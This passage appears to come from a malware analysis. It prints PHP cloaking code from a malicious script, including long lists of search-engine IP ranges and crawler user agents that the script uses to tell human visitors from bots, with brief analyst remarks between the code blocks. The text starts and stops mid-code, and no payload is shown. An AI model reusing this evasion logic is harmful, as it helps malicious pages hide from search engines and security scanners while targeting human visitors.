"67\.195\.98\.[0-9]+", "67\.69\.[0-9]+\.[0-9]+", "67\.93\.[0-9]+\.[0-9]+", "68\.142\.195\.[0-9]+", "68\.142\.203\.[0-9]+", "68\.142\.211\.[0-9]+", "68\.142\.212\.[0-9]+", "68\.142\.230\.[0-9]+", "68\.142\.231\.[0-9]+", "68\.142\.240\.[0-9]+", "68\.142\.246\.[0-9]+", "68\.142\.249\.[0-9]+", "68\.142\.250\.[0-9]+", "68\.142\.251\.[0-9]+", "68\.180\.216\.[0-9]+", "68\.180\.250\.[0-9]+", "68\.180\.251\.[0-9]+", "69\.111\.[0-9]+\.[0-9]+", "69\.147\.79\.[0-9]+", "69\.224\.[0-9]+\.[0-9]+", "69\.228\.[0-9]+\.[0-9]+", "69\.236\.[0-9]+\.[0-9]+", "69\.237\.[0-9]+\.[0-9]+", "70\.239\.[0-9]+\.[0-9]+", "70\.32\.[0-9]+\.[0-9]+", "70\.90\.[0-9]+\.[0-9]+", "71\.130\.[0-9]+\.[0-9]+", "72\.14\.[0-9]+\.[0-9]+", "72\.16\.[0-9]+\.[0-9]+", "72\.30\.101\.[0-9]+", "72\.30\.102\.[0-9]+", "72\.30\.103\.[0-9]+", "72\.30\.104\.[0-9]+", "72\.30\.107\.[0-9]+", "72\.30\.110\.[0-9]+", "72\.30\.111\.[0-9]+", "72\.30\.124\.[0-9]+", "72\.30\.128\.[0-9]+", "72\.30\.129\.[0-9]+", "72\.30\.131\.[0-9]+", "72\.30\.132\.[0-9]+", "72\.30\.133\.[0-9]+", "72\.30\.134\.[0-9]+", "72\.30\.135\.[0-9]+", "72\.30\.142\.[0-9]+", "72\.30\.161\.[0-9]+", "72\.30\.177\.[0-9]+", "72\.30\.179\.[0-9]+", "72\.30\.213\.[0-9]+", "72\.30\.214\.[0-9]+", "72\.30\.215\.[0-9]+", "72\.30\.216\.[0-9]+", "72\.30\.221\.[0-9]+", "72\.30\.226\.[0-9]+", "72\.30\.252\.[0-9]+", "72\.30\.54\.[0-9]+", "72\.30\.56\.[0-9]+", "72\.30\.60\.[0-9]+", "72\.30\.61\.[0-9]+", "72\.30\.65\.[0-9]+", "72\.30\.78\.[0-9]+", "72\.30\.79\.[0-9]+", "72\.30\.81\.[0-9]+", "72\.30\.87\.[0-9]+", "72\.30\.9\.[0-9]+", "72\.30\.97\.[0-9]+", "72\.30\.98\.[0-9]+", "72\.30\.99\.[0-9]+", "74\.125\.[0-9]+\.[0-9]+", "74\.55\.27\.[0-9]+", "74\.55\.27\.[0-9]+", "74\.6\.11\.[0-9]+", "74\.6\.12\.[0-9]+", "74\.6\.13\.[0-9]+", "74\.6\.131\.[0-9]+", "74\.6\.16\.[0-9]+", "74\.6\.17\.[0-9]+", "74\.6\.18\.[0-9]+", "74\.6\.19\.[0-9]+", "74\.6\.20\.[0-9]+", "74\.6\.21\.[0-9]+", "74\.6\.22\.[0-9]+", "74\.6\.23\.[0-9]+", "74\.6\.24\.[0-9]+", "74\.6\.240\.[0-9]+", "74\.6\.25\.[0-9]+", 
"74\.6\.26\.[0-9]+", "74\.6\.27\.[0-9]+", "74\.6\.28\.[0-9]+", "74\.6\.29\.[0-9]+", "74\.6\.30\.[0-9]+", "74\.6\.31\.[0-9]+", "74\.6\.65\.[0-9]+", "74\.6\.66\.[0-9]+", "74\.6\.67\.[0-9]+", "74\.6\.68\.[0-9]+", "74\.6\.69\.[0-9]+", "74\.6\.7\.[0-9]+", "74\.6\.70\.[0-9]+", "74\.6\.71\.[0-9]+", "74\.6\.72\.[0-9]+", "74\.6\.73\.[0-9]+", "74\.6\.74\.[0-9]+", "74\.6\.75\.[0-9]+", "74\.6\.76\.[0-9]+", "74\.6\.79\.[0-9]+", "74\.6\.8\.[0-9]+", "74\.6\.85\.[0-9]+", "74\.6\.86\.[0-9]+", "74\.6\.87\.[0-9]+", "74\.6\.9\.[0-9]+", "75\.17\.[0-9]+\.[0-9]+", "75\.23\.[0-9]+\.[0-9]+", "75\.37\.[0-9]+\.[0-9]+", "75\.52\.[0-9]+\.[0-9]+", "76\.200\.[0-9]+\.[0-9]+", "76\.220\.[0-9]+\.[0-9]+", "76\.231\.[0-9]+\.[0-9]+", "76\.242\.[0-9]+\.[0-9]+", "76\.246\.[0-9]+\.[0-9]+", "77\.109\.[0-9]+\.[0-9]+", "77\.40\.[0-9]+\.[0-9]+", "78\.8\.[0-9]+\.[0-9]+", "8\.6\.[0-9]+\.[0-9]+", "8\.8\.[0-9]+\.[0-9]+", "80\.146\.[0-9]+\.[0-9]+", "80\.169\.[0-9]+\.[0-9]+", "80\.231\.[0-9]+\.[0-9]+", "80\.239\.[0-9]+\.[0-9]+", "80\.77\.[0-9]+\.[0-9]+", "81\.211\.[0-9]+\.[0-9]+", "82\.94\.[0-9]+\.[0-9]+", "83\.220\.[0-9]+\.[0-9]+", "84\.233\.[0-9]+\.[0-9]+", "86\.127\.[0-9]+\.[0-9]+", "87\.244\.[0-9]+\.[0-9]+", "89\.114\.[0-9]+\.[0-9]+", "89\.175\.[0-9]+\.[0-9]+", "89\.207\.[0-9]+\.[0-9]+", "89\.96\.[0-9]+\.[0-9]+", "92\.45\.[0-9]+\.[0-9]+", "93\.94\.[0-9]+\.[0-9]+", "94\.200\.[0-9]+\.[0-9]+", "94\.40\.[0-9]+\.[0-9]+", "94\.75\.242\.[0-9]+", "95\.172\.[0-9]+\.[0-9]+", "99\.136\.[0-9]+\.[0-9]+", "99\.148\.[0-9]+\.[0-9]+", "99\.163\.[0-9]+\.[0-9]+", "99\.40\.[0-9]+\.[0-9]+", "99\.55\.[0-9]+\.[0-9]+", "99\.96\.[0-9]+\.[0-9]+" );
Note that the CUILL range is the attacker’s bot gateway – likely a hijacked BGP session, or maybe they just give away Russian IP space.
$stop_agents_masks = array('http', 'google', 'slurp', 'msnbot', 'bot', 'crawl', 'spider', 'robot', 'HttpClient', 'curl', 'PHP', 'Indy Library', 'WordPress','Charlotte','wwwster','Python','urllib','perl','libwww','lynx','Twiceler','rambler','yandex','snoopy','aport','nginx','nagios','twitter');
$server_user_agent = preg_replace("|User\.Agent\:[\s ]?|i", "", @$server_user_agent);
$is_human = true;
$detected_str = "";
foreach ($stop_ips_masks as $stop_ip_mask)
    if(preg_match("/{$stop_ip_mask}/i", $server_ip)) {
        $is_human = false;
        $detected_str = "by ip";
        break;
    }
if ( ($is_human == true) && (IsBotIPType2($server_ip) == true ) ) {
    $is_human = false;
    $detected_str = "by ip type2";
}
if($is_human)
    foreach($stop_agents_masks as $stop_agents_mask)
        if(preg_match('/'.$stop_agents_mask.'/i', @$server_user_agent)) {
            $is_human = false;
            $detected_str = "by agent";
            break;
        }
if($is_human and !preg_match("/^[a-zA-Z]{5,}/i", @$server_user_agent)) {
    $is_human = false;
    $detected_str = "not human agent";
}
if($is_human and strlen($server_user_agent)<=11) {
    $is_human = false;
    $detected_str = "so small agent";
}
if(@stristr($server_referer, $server_query_string)) {
    $is_human = false;
    $detected_str = "referer=query_string";
}
Here is the end of the logic for deciding what execution path you take, and here begins the next bot declaration
$data = array (
    "BOT({$detected_str})",
    gmdate("d.m H:i:s"),
    "request_uri({$server_request_uri})",
    $server_ip,
    $hostname,
    $server_query_string,
    $server_referer,
    $server_user_agent
);
//if (!$is_human)
//{
//    HandleLog($data);
//}
return $is_human;
}
function IsBotIPType2 ($ip) { if ( stripos($ip, '91.224.140.105') !== false || stripos($ip, '220.241.72') !== false || stripos($ip, '209.185.108') !== false || stripos($ip, '128.2.140') !== false || stripos($ip, '209.185.253') !== false || stripos($ip, '209.85.238') !== false || stripos($ip, '209.85.238.11') !== false || stripos($ip, '209.85.238.4') !== false || stripos($ip, '216.239.33.96') !== false || stripos($ip, '216.239.33.97') !== false || stripos($ip, '216.239.33.98') !== false || stripos($ip, '216.239.33.99') !== false || stripos($ip, '216.239.37.98') !== false || stripos($ip, '216.239.37.99') !== false || stripos($ip, '216.239.39.98') !== false || stripos($ip, '216.239.39.99') !== false || stripos($ip, '216.239.41.96') !== false || stripos($ip, '216.239.41.97') !== false || stripos($ip, '216.239.41.98') !== false || stripos($ip, '216.239.41.99') !== false || stripos($ip, '216.239.45.4') !== false || stripos($ip, '216.239.46') !== false || stripos($ip, '216.239.51.96') !== false || stripos($ip, '216.239.51.97') !== false || stripos($ip, '216.239.51.98') !== false || stripos($ip, '216.239.51.99') !== false || stripos($ip, '216.239.53.98') !== false || stripos($ip, '216.239.53.99') !== false || stripos($ip, '216.239.57.96') !== false || stripos($ip, '216.239.57.97') !== false || stripos($ip, '216.239.57.98') !== false || stripos($ip, '216.239.57.99') !== false || stripos($ip, '216.239.59.98') !== false || stripos($ip, '216.239.59.99') !== false || stripos($ip, '216.33.229.163') !== false || stripos($ip, '64.233.173.193') !== false || stripos($ip, '64.233.173.194') !== false || stripos($ip, '64.233.173.195') !== false || stripos($ip, '64.233.173.196') !== false || stripos($ip, '64.233.173.197') !== false || stripos($ip, '64.233.173.198') !== false || stripos($ip, '64.233.173.199') !== false || stripos($ip, '64.233.173.200') !== false || stripos($ip, '64.233.173.201') !== false || stripos($ip, '64.233.173.202') !== false || stripos($ip, '64.233.173.203') !== 
false || stripos($ip, '64.233.173.204') !== false || stripos($ip, '64.233.173.205') !== false || stripos($ip, '64.233.173.206') !== false || stripos($ip, '64.233.173.207') !== false || stripos($ip, '64.233.173.208') !== false || stripos($ip, '64.233.173.209') !== false || stripos($ip, '64.233.173.210') !== false || stripos($ip, '64.233.173.211') !== false || stripos($ip, '64.233.173.212') !== false || stripos($ip, '64.233.173.213') !== false || stripos($ip, '64.233.173.214') !== false || stripos($ip, '64.233.173.215') !== false || stripos($ip, '64.233.173.216') !== false || stripos($ip, '64.233.173.217') !== false || stripos($ip, '64.233.173.218') !== false || stripos($ip, '64.233.173.219') !== false || stripos($ip, '64.233.173.220') !== false || stripos($ip, '64.233.173.221') !== false || stripos($ip, '64.233.173.222') !== false || stripos($ip, '64.233.173.223') !== false || stripos($ip, '64.233.173.224') !== false || stripos($ip, '64.233.173.225') !== false || stripos($ip, '64.233.173.226') !== false || stripos($ip, '64.233.173.227') !== false || stripos($ip, '64.233.173.228') !== false || stripos($ip, '64.233.173.229') !== false || stripos($ip, '64.233.173.230') !== false || stripos($ip, '64.233.173.231') !== false || stripos($ip, '64.233.173.232') !== false || stripos($ip, '64.233.173.233') !== false || stripos($ip, '64.233.173.234') !== false || stripos($ip, '64.233.173.235') !== false || stripos($ip, '64.233.173.236') !== false || stripos($ip, '64.233.173.237') !== false || stripos($ip, '64.233.173.238') !== false || stripos($ip, '64.233.173.239') !== false || stripos($ip, '64.233.173.240') !== false || stripos($ip, '64.233.173.241') !== false || stripos($ip, '64.233.173.242') !== false || stripos($ip, '64.233.173.243') !== false || stripos($ip, '64.233.173.244') !== false || stripos($ip, '64.233.173.245') !== false || stripos($ip, '64.233.173.246') !== false || stripos($ip, '64.233.173.247') !== false || stripos($ip, '64.233.173.248') !== false || 
stripos($ip, '64.233.173.249') !== false || stripos($ip, '64.233.173.250') !== false || stripos($ip, '64.233.173.251') !== false || stripos($ip, '64.233.173.252') !== false || stripos($ip, '64.233.173.253') !== false || stripos($ip, '64.233.173.254') !== false || stripos($ip, '64.233.173.255') !== false || stripos($ip, '64.68.80') !== false || stripos($ip, '64.68.81') !== false || stripos($ip, '64.68.82') !== false || stripos($ip, '64.68.83') !== false || stripos($ip, '64.68.84') !== false || stripos($ip, '64.68.85') !== false || stripos($ip, '64.68.86') !== false || stripos($ip, '64.68.87') !== false || stripos($ip, '64.68.88') !== false || stripos($ip, '64.68.89') !== false || stripos($ip, '64.68.90.1') !== false || stripos($ip, '64.68.90.10') !== false || stripos($ip, '64.68.90.11') !== false || stripos($ip, '64.68.90.12') !== false || stripos($ip, '64.68.90.129') !== false || stripos($ip, '64.68.90.13') !== false || stripos($ip, '64.68.90.130') !== false || stripos($ip, '64.68.90.131') !== false || stripos($ip, '64.68.90.132') !== false || stripos($ip, '64.68.90.133') !== false || stripos($ip, '64.68.90.134') !== false || stripos($ip, '64.68.90.135') !== false || stripos($ip, '64.68.90.136') !== false || stripos($ip, '64.68.90.137') !== false || stripos($ip, '64.68.90.138') !== false || stripos($ip, '64.68.90.139') !== false || stripos($ip, '64.68.90.14') !== false || stripos($ip, '64.68.90.140') !== false || stripos($ip, '64.68.90.141') !== false || stripos($ip, '64.68.90.142') !== false || stripos($ip, '64.68.90.143') !== false || stripos($ip, '64.68.90.144') !== false || stripos($ip, '64.68.90.145') !== false || stripos($ip, '64.68.90.146') !== false || stripos($ip, '64.68.90.147') !== false || stripos($ip, '64.68.90.148') !== false || stripos($ip, '64.68.90.149') !== false || stripos($ip, '64.68.90.15') !== false || stripos($ip, '64.68.90.150') !== false || stripos($ip, '64.68.90.151') !== false || stripos($ip, '64.68.90.152') !== false || stripos($ip, 
'64.68.90.153') !== false || stripos($ip, '64.68.90.154') !== false || stripos($ip, '64.68.90.155') !== false || stripos($ip, '64.68.90.156') !== false || stripos($ip, '64.68.90.157') !== false || stripos($ip, '64.68.90.158') !== false || stripos($ip, '64.68.90.159') !== false || stripos($ip, '64.68.90.16') !== false || stripos($ip, '64.68.90.160') !== false || stripos($ip, '64.68.90.161') !== false || stripos($ip, '64.68.90.162') !== false || stripos($ip, '64.68.90.163') !== false || stripos($ip, '64.68.90.164') !== false || stripos($ip, '64.68.90.165') !== false || stripos($ip, '64.68.90.166') !== false || stripos($ip, '64.68.90.167') !== false || stripos($ip, '64.68.90.168') !== false || stripos($ip, '64.68.90.169') !== false || stripos($ip, '64.68.90.17') !== false || stripos($ip, '64.68.90.170') !== false || stripos($ip, '64.68.90.171') !== false || stripos($ip, '64.68.90.172') !== false || stripos($ip, '64.68.90.173') !== false || stripos($ip, '64.68.90.174') !== false || stripos($ip, '64.68.90.175') !== false || stripos($ip, '64.68.90.176') !== false || stripos($ip, '64.68.90.177') !== false || stripos($ip, '64.68.90.178') !== false || stripos($ip, '64.68.90.179') !== false || stripos($ip, '64.68.90.18') !== false || stripos($ip, '64.68.90.180') !== false || stripos($ip, '64.68.90.181') !== false || stripos($ip, '64.68.90.182') !== false || stripos($ip, '64.68.90.183') !== false || stripos($ip, '64.68.90.184') !== false || stripos($ip, '64.68.90.185') !== false || stripos($ip, '64.68.90.186') !== false || stripos($ip, '64.68.90.187') !== false || stripos($ip, '64.68.90.188') !== false || stripos($ip, '64.68.90.189') !== false || stripos($ip, '64.68.90.19') !== false || stripos($ip, '64.68.90.190') !== false || stripos($ip, '64.68.90.191') !== false || stripos($ip, '64.68.90.192') !== false || stripos($ip, '64.68.90.193') !== false || stripos($ip, '64.68.90.194') !== false || stripos($ip, '64.68.90.195') !== false || stripos($ip, '64.68.90.196') !== false || 
stripos($ip, '64.68.90.197') !== false || stripos($ip, '64.68.90.198') !== false || stripos($ip, '64.68.90.199') !== false || stripos($ip, '64.68.90.2') !== false || stripos($ip, '64.68.90.20') !== false || stripos($ip, '64.68.90.200') !== false || stripos($ip, '64.68.90.201') !== false || stripos($ip, '64.68.90.202') !== false || stripos($ip, '64.68.90.203') !== false || stripos($ip, '64.68.90.204') !== false || stripos($ip, '64.68.90.205') !== false || stripos($ip, '64.68.90.206') !== false || stripos($ip, '64.68.90.207') !== false || stripos($ip, '64.68.90.208') !== false || stripos($ip, '64.68.90.21') !== false || stripos($ip, '64.68.90.22') !== false || stripos($ip, '64.68.90.23') !== false || stripos($ip, '64.68.90.24') !== false || stripos($ip, '64.68.90.25') !== false || stripos($ip, '64.68.90.26') !== false || stripos($ip, '64.68.90.27') !== false || stripos($ip, '64.68.90.28') !== false || stripos($ip, '64.68.90.29') !== false || stripos($ip, '64.68.90.3') !== false || stripos($ip, '64.68.90.30') !== false || stripos($ip, '64.68.90.31') !== false || stripos($ip, '64.68.90.32') !== false || stripos($ip, '64.68.90.33') !== false || stripos($ip, '64.68.90.34') !== false || stripos($ip, '64.68.90.35') !== false || stripos($ip, '64.68.90.36') !== false || stripos($ip, '64.68.90.37') !== false || stripos($ip, '64.68.90.38') !== false || stripos($ip, '64.68.90.39') !== false || stripos($ip, '64.68.90.4') !== false || stripos($ip, '64.68.90.40') !== false || stripos($ip, '64.68.90.41') !== false || stripos($ip, '64.68.90.42') !== false || stripos($ip, '64.68.90.43') !== false || stripos($ip, '64.68.90.44') !== false || stripos($ip, '64.68.90.45') !== false || stripos($ip, '64.68.90.46') !== false || stripos($ip, '64.68.90.47') !== false || stripos($ip, '64.68.90.48') !== false || stripos($ip, '64.68.90.49') !== false || stripos($ip, '64.68.90.5') !== false || stripos($ip, '64.68.90.50') !== false || stripos($ip, '64.68.90.51') !== false || stripos($ip, 
'64.68.90.52') !== false || stripos($ip, '64.68.90.53') !== false || stripos($ip, '64.68.90.54') !== false || stripos($ip, '64.68.90.55') !== false || stripos($ip, '64.68.90.56') !== false || stripos($ip, '64.68.90.57') !== false || stripos($ip, '64.68.90.58') !== false || stripos($ip, '64.68.90.59') !== false || stripos($ip, '64.68.90.6') !== false || stripos($ip, '64.68.90.60') !== false || stripos($ip, '64.68.90.61') !== false || stripos($ip, '64.68.90.62') !== false || stripos($ip, '64.68.90.63') !== false || stripos($ip, '64.68.90.64') !== false || stripos($ip, '64.68.90.65') !== false || stripos($ip, '64.68.90.66') !== false || stripos($ip, '64.68.90.67') !== false || stripos($ip, '64.68.90.68') !== false || stripos($ip, '64.68.90.69') !== false || stripos($ip, '64.68.90.7') !== false || stripos($ip, '64.68.90.70') !== false || stripos($ip, '64.68.90.71') !== false || stripos($ip, '64.68.90.72') !== false || stripos($ip, '64.68.90.73') !== false || stripos($ip, '64.68.90.74') !== false || stripos($ip, '64.68.90.75') !== false || stripos($ip, '64.68.90.76') !== false || stripos($ip, '64.68.90.77') !== false || stripos($ip, '64.68.90.78') !== false || stripos($ip, '64.68.90.79') !== false || stripos($ip, '64.68.90.8') !== false || stripos($ip, '64.68.90.80') !== false || stripos($ip, '64.68.90.9') !== false || stripos($ip, '64.68.91') !== false || stripos($ip, '64.68.92') !== false || stripos($ip, '66.249.64') !== false || stripos($ip, '66.249.65') !== false || stripos($ip, '66.249.66') !== false || stripos($ip, '66.249.67') !== false || stripos($ip, '66.249.68') !== false || stripos($ip, '66.249.69') !== false || stripos($ip, '66.249.70') !== false || stripos($ip, '66.249.71') !== false || stripos($ip, '66.249.72') !== false || stripos($ip, '66.249.73') !== false || stripos($ip, '66.249.78') !== false || stripos($ip, '66.249.79') !== false || stripos($ip, '72.14.199') !== false || stripos($ip, '8.6.48') !== false || stripos($ip, '141.185.209') !== false || 
stripos($ip, '169.207.238') !== false || stripos($ip, '199.177.18.9') !== false || stripos($ip, '202.160.178') !== false || stripos($ip, '202.160.179') !== false || stripos($ip, '202.160.180') !== false || stripos($ip, '202.160.181') !== false || stripos($ip, '202.160.183.182') !== false || stripos($ip, '202.160.183.217') !== false || stripos($ip, '202.160.183.218') !== false || stripos($ip, '202.160.183.219') !== false || stripos($ip, '202.160.183.220') !== false || stripos($ip, '202.160.183.235') !== false || stripos($ip, '202.160.183.239') !== false || stripos($ip, '202.160.183.245') !== false || stripos($ip, '202.160.185.174') !== false || stripos($ip, '202.165.96.142') !== false || stripos($ip, '202.165.98') !== false || stripos($ip, '202.165.99') !== false || stripos($ip, '202.212.5.30') !== false || stripos($ip, '202.212.5.32') !== false || stripos($ip, '202.212.5.33') !== false || stripos($ip, '202.212.5.34') !== false || stripos($ip, '202.212.5.35') !== false || stripos($ip, '202.212.5.36') !== false || stripos($ip, '202.212.5.37') !== false || stripos($ip, '202.212.5.38') !== false || stripos($ip, '202.212.5.39') !== false || stripos($ip, '202.212.5.47') !== false || stripos($ip, '202.212.5.48') !== false || stripos($ip, '202.46.19.93') !== false || stripos($ip, '203.123.188.2') !== false || stripos($ip, '203.141.52.41') !== false || stripos($ip, '203.141.52.42') !== false || stripos($ip, '203.141.52.43') !== false || stripos($ip, '203.141.52.44') !== false || stripos($ip, '203.141.52.45') !== false || stripos($ip, '203.141.52.46') !== false || stripos($ip, '203.141.52.47') !== false || stripos($ip, '203.255.234.102') !== false || stripos($ip, '203.255.234.103') !== false || stripos($ip, '203.255.234.105') !== false || stripos($ip, '203.255.234.106') !== false || stripos($ip, '206.190.43.125') !== false || stripos($ip, '206.190.43.81') !== false || stripos($ip, '207.126.239.224') !== false || stripos($ip, '209.1.12') !== false || stripos($ip, 
'209.1.13.101') !== false || stripos($ip, '209.1.13.231') !== false || stripos($ip, '209.1.13.232') !== false || stripos($ip, '209.1.32.122') !== false || stripos($ip, '209.1.38') !== false || stripos($ip, '209.131.40') !== false || stripos($ip, '209.131.41') !== false || stripos($ip, '209.131.48') !== false || stripos($ip, '209.131.49.37') !== false || stripos($ip, '209.131.50.153') !== false || stripos($ip, '209.131.51.166') !== false || stripos($ip, '209.131.60.169') !== false || stripos($ip, '209.131.60.170') !== false || stripos($ip, '209.131.60.171') !== false || stripos($ip, '209.131.60.19') !== false || stripos($ip, '209.131.62.107') !== false || stripos($ip, '209.131.62.108') !== false || stripos($ip, '209.131.62.109') !== false || stripos($ip, '209.131.62.214') !== false || stripos($ip, '209.185.122') !== false || stripos($ip, '209.185.141') !== false || stripos($ip, '209.185.143') !== false || stripos($ip, '209.191.123.33') !== false || stripos($ip, '209.191.64.227') !== false || stripos($ip, '209.191.65') !== false || stripos($ip, '209.191.65.249') !== false || stripos($ip, '209.191.65.82') !== false || stripos($ip, '209.191.82.245') !== false || stripos($ip, '209.191.82.252') !== false || stripos($ip, '209.191.83') !== false || stripos($ip, '209.191.83.220') !== false || stripos($ip, '209.191.87.215') !== false || stripos($ip, '209.191.87.216') !== false || stripos($ip, '209.191.87.217') !== false || stripos($ip, '209.191.87.218') !== false || stripos($ip, '209.191.87.219') !== false || stripos($ip, '209.191.87.220') !== false || stripos($ip, '209.191.87.221') !== false || stripos($ip, '209.191.87.222') !== false || stripos($ip, '209.191.87.223') !== false || stripos($ip, '209.67.206.126') !== false || stripos($ip, '209.67.206.127') !== false || stripos($ip, '209.67.206.133') !== false || stripos($ip, '209.73.176.128') !== false || stripos($ip, '209.73.176.129') !== false || stripos($ip, '209.73.176.133') !== false || stripos($ip, '209.73.176.134') !== 
false || stripos($ip, '209.73.176.136') !== false || stripos($ip, '211.14.8.240') !== false || stripos($ip, '211.169.241.21') !== false || stripos($ip, '213.216.143.37') !== false || stripos($ip, '213.216.143.38') !== false || stripos($ip, '213.216.143.39') !== false || stripos($ip, '216.109.121.70') !== false || stripos($ip, '216.109.121.71') !== false || stripos($ip, '216.109.126.131') !== false || stripos($ip, '216.109.126.133') !== false || stripos($ip, '216.109.126.137') !== false || stripos($ip, '216.109.126.138') !== false || stripos($ip, '216.109.126.139') !== false || stripos($ip, '216.109.126.141') !== false || stripos($ip, '216.109.126.143') !== false || stripos($ip, '216.109.126.145') !== false || stripos($ip, '216.109.126.146') !== false || stripos($ip, '216.109.126.147') !== false || stripos($ip, '216.109.126.150') !== false || stripos($ip, '216.109.126.152') !== false || stripos($ip, '216.109.126.157') !== false || stripos($ip, '216.109.126.158') !== false || stripos($ip, '216.109.126.159') !== false || stripos($ip, '216.109.126.160') !== false || stripos($ip, '216.109.126.161') !== false || stripos($ip, '216.136.233.164') !== false || stripos($ip, '216.145.58.219') !== false || stripos($ip, '216.155.198.60') !== false || stripos($ip, '216.155.200') !== false || stripos($ip, '216.155.202.175') !== false || stripos($ip, '216.155.202.54') !== false || stripos($ip, '216.155.204.40') !== false || stripos($ip, '216.239.193.71') !== false || stripos($ip, '216.239.193.72') !== false || stripos($ip, '216.239.193.73') !== false || stripos($ip, '216.239.193.74') !== false || stripos($ip, '216.239.193.75') !== false || stripos($ip, '216.239.193.76') !== false || stripos($ip, '216.239.193.77') !== false || stripos($ip, '216.239.193.78') !== false || stripos($ip, '216.239.193.79') !== false || stripos($ip, '216.239.193.80') !== false || stripos($ip, '216.239.193.81') !== false || stripos($ip, '216.239.193.82') !== false || stripos($ip, '216.239.193.83') !== false 
|| stripos($ip, '216.239.193.84') !== false || stripos($ip, '216.239.193.85') !== false || stripos($ip, '216.239.193.86') !== false || stripos($ip, '216.32.237.1') !== false || stripos($ip, '216.32.237.10') !== false || stripos($ip, '216.32.237.11') !== false || stripos($ip, '216.32.237.12') !== false || stripos($ip, '216.32.237.13') !== false || stripos($ip, '216.32.237.14') !== false || stripos($ip, '216.32.237.15') !== false || stripos($ip, '216.32.237.16') !== false || stripos($ip, '216.32.237.17') !== false || stripos($ip, '216.32.237.18') !== false || stripos($ip, '216.32.237.19') !== false || stripos($ip, '216.32.237.20') !== false || stripos($ip, '216.32.237.21') !== false || stripos($ip, '216.32.237.22') !== false || stripos($ip, '216.32.237.23') !== false || stripos($ip, '216.32.237.24') !== false || stripos($ip, '216.32.237.25') !== false || stripos($ip, '216.32.237.26') !== false || stripos($ip, '216.32.237.27') !== false || stripos($ip, '216.32.237.28') !== false || stripos($ip, '216.32.237.29') !== false || stripos($ip, '216.32.237.30') !== false || stripos($ip, '216.32.237.7') !== false || stripos($ip, '216.32.237.8') !== false || stripos($ip, '216.32.237.9') !== false || stripos($ip, '62.172.199.20') !== false || stripos($ip, '62.172.199.21') !== false || stripos($ip, '62.172.199.22') !== false || stripos($ip, '62.172.199.23') !== false || stripos($ip, '62.172.199.24') !== false || stripos($ip, '62.27.59.245') !== false || stripos($ip, '63.163.102.180') !== false || stripos($ip, '63.163.102.181') !== false || stripos($ip, '63.163.102.182') !== false || stripos($ip, '64.157.137.219') !== false || stripos($ip, '64.157.137.220') !== false || stripos($ip, '64.157.137.221') !== false || stripos($ip, '64.157.137.225') !== false || stripos($ip, '64.157.138.103') !== false || stripos($ip, '64.157.138.108') !== false || stripos($ip, '64.75.36.42') !== false || stripos($ip, '64.75.36.43') !== false || stripos($ip, '64.75.36.44') !== false || stripos($ip, 
'64.75.36.45') !== false || stripos($ip, '64.75.36.47') !== false || stripos($ip, '64.75.36.77') !== false || stripos($ip, '64.75.36.79') !== false || stripos($ip, '64.75.36.80') !== false || stripos($ip, '66.163.170.157') !== false || stripos($ip, '66.163.170.159') !== false || stripos($ip, '66.163.170.161') !== false || stripos($ip, '66.163.170.162') !== false || stripos($ip, '66.163.170.166') !== false || stripos($ip, '66.163.170.167') !== false || stripos($ip, '66.163.170.170') !== false || stripos($ip, '66.163.170.172') !== false || stripos($ip, '66.163.170.176') !== false || stripos($ip, '66.163.170.178') !== false || stripos($ip, '66.163.170.179') !== false || stripos($ip, '66.163.170.180') !== false || stripos($ip, '66.163.170.184') !== false || stripos($ip, '66.163.170.185') !== false || stripos($ip, '66.163.170.190') !== false || stripos($ip, '66.163.170.192') !== false || stripos($ip, '66.163.174.65') !== false || stripos($ip, '66.196.101') !== false || stripos($ip, '66.196.65') !== false || stripos($ip, '66.196.67.100') !== false || stripos($ip, '66.196.67.101') !== false || stripos($ip, '66.196.67.102') !== false || stripos($ip, '66.196.67.103') !== false || stripos($ip, '66.196.67.104') !== false || stripos($ip, '66.196.67.105') !== false || stripos($ip, '66.196.67.106') !== false || stripos($ip, '66.196.67.107') !== false || stripos($ip, '66.196.67.108') !== false || stripos($ip, '66.196.67.109') !== false || stripos($ip, '66.196.67.110') !== false || stripos($ip, '66.196.67.111') !== false || stripos($ip, '66.196.67.112') !== false || stripos($ip, '66.196.67.113') !== false || stripos($ip, '66.196.67.114') !== false || stripos($ip, '66.196.67.115') !== false || stripos($ip, '66.196.67.116') !== false || stripos($ip, '66.196.67.117') !== false || stripos($ip, '66.196.67.118') !== false || stripos($ip, '66.196.67.119') !== false || stripos($ip, '66.196.67.120') !== false || stripos($ip, '66.196.67.121') !== false || stripos($ip, '66.196.67.122') !== 
false || stripos($ip, '66.196.67.123') !== false || stripos($ip, '66.196.67.124') !== false || stripos($ip, '66.196.67.125') !== false || stripos($ip, '66.196.67.126') !== false || stripos($ip, '66.196.67.127') !== false || stripos($ip, '66.196.67.128') !== false || stripos($ip, '66.196.67.129') !== false || stripos($ip, '66.196.67.130') !== false || stripos($ip, '66.196.67.150') !== false || stripos($ip, '66.196.67.151') !== false || stripos($ip, '66.196.67.176') !== false || stripos($ip, '66.196.67.177') !== false || stripos($ip, '66.196.67.178') !== false || stripos($ip, '66.196.67.200') !== false || stripos($ip, '66.196.67.201') !== false || stripos($ip, '66.196.67.202') !== false || stripos($ip, '66.196.67.203') !== false || stripos($ip, '66.196.67.204') !== false || stripos($ip, '66.196.67.205') !== false || stripos($ip, '66.196.67.206') !== false || stripos($ip, '66.196.67.207') !== false || stripos($ip, '66.196.67.208') !== false || stripos($ip, '66.196.67.209') !== false || stripos($ip, '66.196.67.210') !== false || stripos($ip, '66.196.67.211') !== false || stripos($ip, '66.196.67.212') !== false || stripos($ip, '66.196.67.213') !== false || stripos($ip, '66.196.67.214') !== false || stripos($ip, '66.196.67.215') !== false || stripos($ip, '66.196.67.216') !== false || stripos($ip, '66.196.67.217') !== false || stripos($ip, '66.196.67.218') !== false || stripos($ip, '66.196.67.219') !== false || stripos($ip, '66.196.67.220') !== false || stripos($ip, '66.196.67.221') !== false || stripos($ip, '66.196.67.222') !== false || stripos($ip, '66.196.67.223') !== false || stripos($ip, '66.196.67.224') !== false || stripos($ip, '66.196.67.225') !== false || stripos($ip, '66.196.67.226') !== false || stripos($ip, '66.196.67.227') !== false || stripos($ip, '66.196.67.228') !== false || stripos($ip, '66.196.67.229') !== false || stripos($ip, '66.196.67.230') !== false || stripos($ip, '66.196.67.231') !== false || stripos($ip, '66.196.67.232') !== false || stripos($ip, 
